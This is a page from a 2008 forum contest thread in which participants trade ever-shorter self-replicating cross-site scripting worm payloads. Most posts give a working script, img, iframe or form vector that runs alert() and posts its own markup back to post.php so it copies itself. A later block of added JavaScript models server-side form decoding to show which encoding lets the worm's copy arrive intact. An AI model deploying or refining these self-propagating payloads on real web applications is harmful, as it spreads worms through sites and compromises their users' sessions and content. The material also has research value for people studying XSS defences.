Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 12 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 12:24PM

<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 12:27PM

OK Ronald, I can get you by two more (you don't need the parens on the ending bold function). Works in FF2 and IE7.

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:33PM

@Matt

Aha, the above does not work; it sends the bold function instead of the payload if you leave out the ().

payload becomes:

function bold() {
    [native code]
}



Edited 3 time(s). Last edit at 01/07/2008 12:36PM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 12:34PM

@Ronald

Yeah really cool :D

Does innerHTML not add the closing iframe tag though?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:37PM

nope

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 07, 2008 12:47PM

I see all kinds of statements of 'works on FF/IE', but I think you didn't test it on the unofficial judge... If you actually try to get it to work, there are all kinds of interesting problems that need to be solved; they involve lots of hacks etc.

Anyway, a widely used optimization I was missing: with(){..;..} -> with()..,.. saving 2 bytes off both vectors, and they work and are tested on FF2/IE7/Opera9.5/Safari3.04:
<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>
254 bytes - XMLHttpRequest, image
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
251 bytes - XMLHttpRequest, script

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:58PM

Just to be sure, Gareth, I close the iframe; this functions in Firebug like a charm and doesn't grow for sure:


<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>

So it becomes: 138Bytes

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:03PM

<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

can also be a winner!



Edited 2 time(s). Last edit at 01/07/2008 02:04PM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 01:05PM

OK, looked at this one through WebScarab on the unofficial (177 bytes). Though it does present doctype issues with IE7.

<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),send('content='+encodeURI('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:09PM

=.

becomes '.' in Firefox.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 07, 2008 01:22PM

Dunno what Firefox you are using, but here it just stays =. If it DOES change, try =/

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:29PM

Internally it changes it to ".", which can also be seen with Firebug since it's invalid markup, so I guess it doesn't count because ultimately it grows in strict theory?

=/ doesn't work here.

I'd be happy to adjust my vector with it; it saves a byte, but I dunno... I guess there is something to be said for valid markup as well.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:36PM

But then again the first of this series:

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

which is 130 bytes, does pass the judges without growing. Still, I'm not sure about the iframe closing tag, so I posted a second. But Firefox internally closes the markup but doesn't output it...

So, are there votes for valid markup as well? Sounds plausible if so.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 07, 2008 01:47PM

Live HTTP Headers gives me this, Ronald:

(post)content=<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())">&lt;/b&gt;</iframe></b>

Content-Length: 157

I guess we should start checking the actual Content-Length instead of our output size. (Well, I was checking the output length anyway, not the Content-Length.)

I bet RSnake uses the Content-Length too.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:53PM

Hence the question. Firebug gave the same, but it still doesn't output it in the page that follows. With a closing tag it's still 138, and that suits me fine. But I bet on the 135-byte img tag instead; sounds safer :)

I have to work, have fun guys!

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 02:21PM

I don't want to be the ant at the picnic, but on Apache 1.3.x/2.2.x with default settings the POST array is simply empty. Again the content-type issue...

Anyway, most of the examples can still be shortened by one byte:


<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>
134

<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
129

Greetings,
.mario

Re: Diminutive XSS Worm Replication Contest
Posted by: beNi
Date: January 07, 2008 03:22PM

So now people are using my <b></b> .bold() solution. Thx :)

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:28PM

Not exactly but I am glad you are happy.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 07, 2008 03:33PM

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">

155

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:44PM

I should be ashamed.. I should be ashamed... I should be ashamed...

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
154



:)



Edited 1 time(s). Last edit at 01/07/2008 03:44PM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 07, 2008 03:45PM

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

154
thnks ma1!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 07, 2008 03:45PM

ahhhh 1 minute late!!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:46PM

Hehe how cool - like sniping on eBay ;)



Edited 1 time(s). Last edit at 01/07/2008 03:46PM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: backStorm
Date: January 07, 2008 03:46PM

hi,

This is actually a conclusion of the solutions around here, but it is shorter and hopefully working (tested only in Firefox).

<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>

Length: 125

-backStorm

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:51PM

@backStorm: onload for an <i> tag probably won't work. Check here for tag/event info.

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 04:04PM

@backStorm - you could do it like this, although there is an element of user interaction required. Also, you do not need to close the a tag, so it saves you a byte to get 124 bytes.

<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

@.mario - You are correct that this does not work in Firefox on either of the (unofficial) judge pages.



Edited 2 time(s). Last edit at 01/07/2008 04:11PM by Matt Presson.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 04:12PM

@mario: the iframe doesn't count since it grows.
(though it's still a debate)

131 then!

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>

Don't ask WHY, but it seems to work.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 04:18PM

@Ronald: Plain wow - it even works on IE7!

I just saw that in FF2 the request is made but not wrapped in the element 'content'. Firebug shows the request as such:

<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))" src=""></b>

It should be:

content=<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))" src=""></b>



Edited 1 time(s). Last edit at 01/07/2008 04:25PM by .mario.
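The Content-Type problem .mario raised earlier, the encodeURI versus encodeURIComponent choice in Matt Presson's and bwb labs' alt-based vectors, and the key-less send(content=...) variant discussed just above all come down to one thing: how the receiving script decodes a form-encoded POST body. What follows is an added example written for this page, not code from the thread, from the contest judge, or from any browser. It models a generic application/x-www-form-urlencoded decoder (the step that populates PHP's $_POST) and runs each body-building strategy through it, with Ronald's 135-byte img vector as the payload. The judge's real post.php is not known here; the assumption is that it reads $_POST['content'] and that a body arriving without the form Content-Type is not form-decoded at all.

```javascript
// Added example for this page; not code from the thread, from the contest judge, or from any browser.
// Models the server side of the worm's POST: a generic application/x-www-form-urlencoded decoder,
// the step that populates PHP's $_POST. Assumption: post.php reads $_POST['content'] and never
// looks at the raw request body.
const FORM_TYPE = 'application/x-www-form-urlencoded';

// Percent-decoding as form decoders do it: '+' is a space, %XX is a byte.
// A malformed escape is left alone rather than thrown on (PHP's urldecode behaviour).
function decodeFormComponent(s) {
  const plusFixed = s.replace(/\+/g, ' ');
  try { return decodeURIComponent(plusFixed); } catch (e) { return plusFixed; }
}

// Decoded parameters, or nothing at all when the request lacks the form Content-Type:
// that is the "POST array is simply empty" case .mario describes.
function parseFormBody(contentType, body) {
  const params = Object.create(null);
  const mime = (contentType || '').split(';')[0].trim().toLowerCase();
  if (mime !== FORM_TYPE) return params;
  for (const pair of body.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const val = eq < 0 ? '' : pair.slice(eq + 1);
    params[decodeFormComponent(key)] = decodeFormComponent(val);
  }
  return params;
}

// The four ways the thread's vectors build the string handed to XMLHttpRequest.send().
const BODY_BUILDERS = {
  raw: html => 'content=' + html,                                    // send('content='+...)
  encodeURI: html => 'content=' + encodeURI(html),                   // Matt Presson's 177-byte alt vector
  encodeURIComponent: html => 'content=' + encodeURIComponent(html), // bwb labs
  keyless: html => html,                                             // send(content=...): the assigned value IS the body
};

// Characters a form decoder rewrites or treats as delimiters. Any of them in an
// unencoded payload means the stored copy differs from the copy that was sent.
function formUnsafeChars(html) {
  return ['+', '&', '%'].filter(c => html.includes(c));
}

// What post.php would see as $_POST['content'] (undefined when the key never arrives).
function replicatedCopy(html, variant, contentType = FORM_TYPE) {
  return parseFormBody(contentType, BODY_BUILDERS[variant](html)).content;
}

function survivesRoundTrip(html, variant, contentType = FORM_TYPE) {
  return replicatedCopy(html, variant, contentType) === html;
}

// Ronald's 135-byte img vector from this thread, used as the payload under test.
const IMG_VECTOR = `<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>`;

console.log('form-unsafe characters in the vector:', formUnsafeChars(IMG_VECTOR));
for (const variant of Object.keys(BODY_BUILDERS)) {
  const ok = survivesRoundTrip(IMG_VECTOR, variant);
  console.log(variant.padEnd(18), ok ? 'round-trips intact' : 'stored copy corrupted or missing');
}
// Per the current XMLHttpRequest spec a string body goes out as text/plain;charset=UTF-8
// unless setRequestHeader() says otherwise, so this is what a header-less send() gets you.
console.log('without the form Content-Type:', replicatedCopy(IMG_VECTOR, 'encodeURIComponent', 'text/plain;charset=UTF-8'));
```

The one character that matters for every .bold() vector on this page is the `+` in `'content='+parentNode`: a form decoder turns it into a space, so a raw or encodeURI body comes back as `'content=' parentNode` on the server, while encodeURIComponent escapes it as %2B and survives. The key-less variant sends the markup itself as the body, so the first `=` inside `src=''` becomes the parameter separator and no `content` key exists at all.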

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 07, 2008 04:19PM

Same premise as Ronald's, but revised with backStorm's.

125 Bytes

<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>



Edited 3 time(s). Last edit at 01/07/2008 04:32PM by Matt Presson.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 07, 2008 04:25PM

Ronald:
it doesn't grow, it has a slice :D

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat
